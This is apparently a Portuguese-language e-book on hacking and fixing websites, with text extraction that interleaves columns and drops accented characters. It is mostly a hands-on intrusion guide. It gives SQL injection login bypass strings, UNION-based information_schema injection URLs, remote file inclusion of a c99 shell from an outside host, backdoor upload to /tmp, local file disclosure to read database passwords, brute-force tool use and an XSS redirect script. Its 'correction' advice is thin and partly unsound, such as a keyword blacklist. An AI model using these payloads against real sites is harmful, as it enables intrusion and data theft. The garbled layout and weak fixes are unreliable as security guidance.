Escolar Documentos
Profissional Documentos
Cultura Documentos
Invasão e Correção em Sites PDF
Invasão e Correção em Sites PDF
Este e - book tem como objetivo no s a invaso, como tambm a preveno e correo em sites da internet.
1 Passo:
Para se fazer a invaso necessrio descobrir falhas ou brechas, que facilitem a intruso, para isso usaremos scanners.
NMAP: Scanner de ips, onde faremos o fingerprint
ACUNETIX: Scanner de falhas, onde scannearemos o site em busca de falhas.
FingerPrint:
Aqui buscaremos falhas no servidor, atravs de programas desatualizados.
Agora digitamos o comando nmap IP -sV -O --version-intensity 5 para iniciar o Fingerprint, se nele aparecer programas antigos,
devemos procurar exploits, um exemplo de pesquisa no google seria: Exploit Apache 2.1 . Normalmente eles sero nas linguagens C,
PHP, PERL, PYTHON, entre outros. No Linux basta digitar um comando no terminal, exemplo: perl expl.pl .
Eu no achei nada, e agora? Calma, no nos demos por vencidos ainda, agora vamos achar vulnerabilidades no site.
Correo: Mantenha sempre os programas atualizados, ou ligue para seu host notificando o programa vulnervel e pea correo.
Scan:
Nessa etapa vamos usar o scanner novamente, s que desta vez o de vulnerabilidades, no nosso caso o Acunetix.
O Acunetix para Windows, mas voc pode tentar emula-lo no wine ou
procurar um programa substituto para Linux. Caso haja alguma falha devemos
explora-la, o que nos leva ao prximo passo.
Robots.txt:
Este arquivo da ordens para os buscadores e as vezes revela ficheiros
ocultos o de administrao.
Normalmente este texto fica na pasta principal do site ex:
www.site.com/robots.txt . Ento procuramos os arquivos que esto dissalow.
Ex:
User-agent: Googlebot Ento vamos nesse diretrio, a area
Disallow: /admin administrative do site, ns podemos
explorar do seguinte modo:
Invaso e Correo em Sites
Autor: $4mu:kt http://www.inw-seguranca.com Twitter: @inwseguranca
O Contedo deste e book somente para conhecimento, e correo, no nos responsabilizamos pelo seu mau uso.
or 1=1
or 1=1
or=
Imagem imasters.com.br or a='a
) or (a='a
Correo:
Brute-Force:
A tcnica Brute-Force chuta o login e a senha que esto em uma lista at acertar. Essas listas (wordlists) podem chegar a
gigabytes, ou seja, milhes e milhes de logins e senhas.
Dois programas muito nusados so o Brutus (Windows) e o THC Hydra (Linux):
Tutorial Brutus Correo:
Para bloquear esse ataque devemos limitar o numero de submits
que cada usurio pode fazer:
<?php
$pagina=$_GET["pagina"];
// Autor: Daniel de Sousa Nascimento
//Verifica se a string passada possui algum trecho invalido
//Caso tenha mostra uma mensagem de erro
if(eregi("http|www|ftp|.dat|.txt|wget", $pagina))
{
echo "Ops! Problemas na pgina!";
//Se a variavel passada estiver dentro das normas, executa o
else abaixo:
}else{
if(!empty($pagina)) {
@include ("$pagina.php");
}else{
Bom, vamos usa-lo para o que ns queremos, entrar na rea admin.
@include ("capa.php");
Type: Coloque o tipo de conexo que queremos quebrar,
}
Http Basic para pginas no baseadas em formulrios. }
Http Form para pginas baseadas em formulrios. ?>
Use Username: Marque se for pedido nome de usurio.
Single User: Marque se voc uqer pegar a senha de s um usurio.
User File: Onde esta o lista de logins.
Positive Authentcation Results: Mostra as senhas que voc pegou.
PHP Injection:
PHP Injection ou Remote File Inclusion explora o uso incorreto da funo include no PHP.
Cdigo Vulnervel: Em um site vulnervel podemos incluir um exploit, podendo fazer um deface, ou at
ownar.
<?php Exemplo: http://phpinj.noads.biz/index.php?pagina= , injetamos uma shell assim:
$pagina=$_GET["pagina"]; http://phpinj.noads.biz/index.php?pagina=http://shell.com /c99.txt , o resultado seria:
include($pagina)
?>
Cdigo Seguro:
<?php
$pagina=$_GET["pagina"];
// Autor: Daniel de Sousa Nascim
ento
if(eregi("http|www|
ftp|.dat|.txt|wget", $pagina))
{ echo "Ops! Problemas na pgina
!";}else{
if(!empty($pagina)) {
@include ("$pagina.php");
}else{
@include ("capa.php");
}
}
?>
O Que fazer se no tenho permisses? Voc deve ir ao caminho /tmp/, l normalmente h, faa upload de uma backdoor,
falaremos dela no prximo capitulo.
Invaso e Correo em Sites
Autor: $4mu:kt http://www.inw-seguranca.com Twitter: @inwseguranca
O Contedo deste e book somente para conhecimento, e correo, no nos responsabilizamos pelo seu mau uso.
Backdoor:
Backdoor (tambm conhecido por Porta dos fundos) uma falha de segurana que pode existir em um programa de computador ou
sistema operacional, que pode permitir a invaso do sistema por um cracker para que ele possa obter um total controle da mquina.
Muitos crackers utilizam-se de um Backdoor para instalar vrus de computador ou outros programas maliciosos, conhecidos como
malware.
Wikipdia
Autor: #Expl0it.
Correo: Use sempre um bom Antivrus e um Firewall, pois ela ser incapacitada pelo Firewall e removida pelo Antivrus.
Invaso e Correo em Sites
Autor: $4mu:kt http://www.inw-seguranca.com Twitter: @inwseguranca
O Contedo deste e book somente para conhecimento, e correo, no nos responsabilizamos pelo seu mau uso.
Cdigo Vulnervel: Local File Disclosure ou LFD permite ver os arquivos do sistema, bem como seus
<?php cdigos-fonte.
// Postado por AllMeida Eu gravei esta vdeo aula: http://www.youtube.com/watch?v=AyPv6caJi8c , mas
$arquivo= $_GET['arquivo']; vou fazer um tutorial para vocs.
$readfile= readfile($arquivo); Se voc fizer abrir uma pagina com o cdigo fonte <?php echo"Ronaldo"; ?> no
?>
navegador vai aparecer apenas Ronaldo. Atravs dessa falha ele vai mostrar
<?php echo"Ronaldo"; ?> ento ns vamos fazer com que mostre as senhas, ao pegarmos uma pgina igual do cdigo vulnervel
injetamos o cdigo pagina.php?arquivo=admin/index.php e veremos o cdigo fonte, normalmente ele vai fazer uma conexo com o
banco de dados e exibira algo como <?php include('conectar.php'); ?> ento vamos na pgina conectar.php, injetando ele novamente
pagina.php?arquivo=admin/index.php e ento ele ira exibir o login para o banco de dados, exemplo:
Ento temos todos os dados para entrar no banco de dados, basta logar no Pgina De Conexo Com Banco De Dados
site, pelo PHPMyAdmin, quase todos os servers tem: <?php
www.site.com.br/phpmyadmin ou www.site.com.br/pma. $host = "localhost";
H vrios jeitos de se explorar essa vulnerabilidade, o outro seria se a $user = "nome_do_usuario";
pagina de administrao no fosse com banco de dados, ai apareceria: $senha = "senha_do_usuario";
Sistema de Login Sem Banco de Dados $dbname = "nome_do_db";
<?php //conecta ao banco de dados
if( $login != nome_admin || $senha != senha_admin ) { mysql_connect($host, $user, $senha) or die("erro");
//Se for difirente, retonar a mensagem:
echo "Login e senha incorretos"; //seleciona o banco de dados
//Se for iguais os dados, corretos, aparece a pgina: mysql_select_db($dbname)or die("erro");
}else{ ?>
logado
?>
Em que o nome de usurio seria: nome_admin e senha: senha_admin.
CSS ou XSS rouba cookies e permiti usa-los como se fosse o usurio original daquele cookie.
Neste artigo do site: http://www.inw-seguranca.com/wordpress/?p=914 , h
dois videos de como explorar esta vulnerabilidade, mas aqui vai um tutorial:
Xss para redirecionar:
Alguns sites possuem murais, ou comentarios que permitem HTML, neles ao
digitar o cdigo:
<script type="text/javascript">
window.location.href="http://seusitehack.com";
</script>
Ento ao ver a pgina ele sera redirecionado para http://seusitehack.com
INFORMATION_SCHEMA
Como j expliquei para vocs, agora iremos capturar do banco de dados as tabelas e as colunas do banco de dados de um site
fictcio.
Supomos que temos a seguinte notcias:
www.site.com.br/noticias.php?id=15
J vimos que ele est vulnervel a SQL Injection e possui 6 colunas. Agora iremos descobrir as tabelas do site atravs do
information_schema, o contedo de nossa materia!
Para isto iremos utilizar um union:
www.site.com.br/noticias.php?id=-15+Union+Select+1,2,3,4,5,6+From+Information_Schema.Tables
Notem que apareceram alguns nmeros na tela, no nosso caso: 2,5,3
Agora vamos fazer o seguinte, no lugar destes nmeros iremos colocar as tabelas do information_schema, adicionando um limite:
http://www.site.com.br/noticias.php?id=-15+Union+Select+1,table_name,3,4,5,6+From+Information_Schema.Tables+limit 0,1
Agora voc vai aumentando o limite para 1,1 / 2,1 / 3,1 / 4,1 at encontrar alguma tabela tipo: admin, usuarios, user, membros.
administradores, bd_admin, db_admin etc
Vamos supor agora que encontramos a tabela usuarios em 20,1:
http://www.site.com.br/noticias.php?id=-15+Union+Select+1,table_name,3,4,5,6+From+Information_Schema.Tables+limit 20,1
Agora iremos achar as colunas da tabela usuarios:
http://www.site.com.br/noticias.php?id=-15+Union+Select+1,Column_name,3,4,5,6+From+Information_Schema.Columns+Where
Table.name=usuarios+limit+0,1
(Lembrando que este mtodo no funcionar se existir filtragem magic quote no site)
Caso a filtragem esteja ativa poderemos utilizar assim e ver uma por uma:
http://www.site.com.br/noticias.php?id=-15+Union+Select+1,Column_name,3,4,5,6+From+Information_Schema.Columns+limit+0,1
E ento ir procurando at encontrar as colunas: senha, usuario, username, login, password, user, email etc
CONCLUSO
Neste tutorial ensinei vocs a descobrirem as tabelas e as colunas de um banco de dados utilizando o information_schema! Com este
mtodo voc no obrigado a ir chutando nomes de tabelas e colunas at encontrar ela, ou utilizar algum programa especfico. Voc
faz manualmente. A est a verdadeira arte do SQL Injection!
Esta matria eu fiz agora, no elaborei muito, ento se houver algum erro avisem hehehe
Espero que todos tenham gostado e que ela seja bastante til!
Tambm complementando outro mtodo que no coloquei na matria:
www.site.com.br/noticias.php?id=-15+Union+Select+1,Group_Concat(Table_Name),3,4,5,6+from+information_schema.tables+where+table_schema=database()
Concluso:
Aqui aprendemos algumas falhas e ataques, mas tambem como nos proteger, mas fique atento, novas vulnerabilidades e falhas
aparecem a cada minuto, por isso esteja em constante procura.
Obrigado a todos que leram esse e-book, espero ter sido util, e at a prxima ;)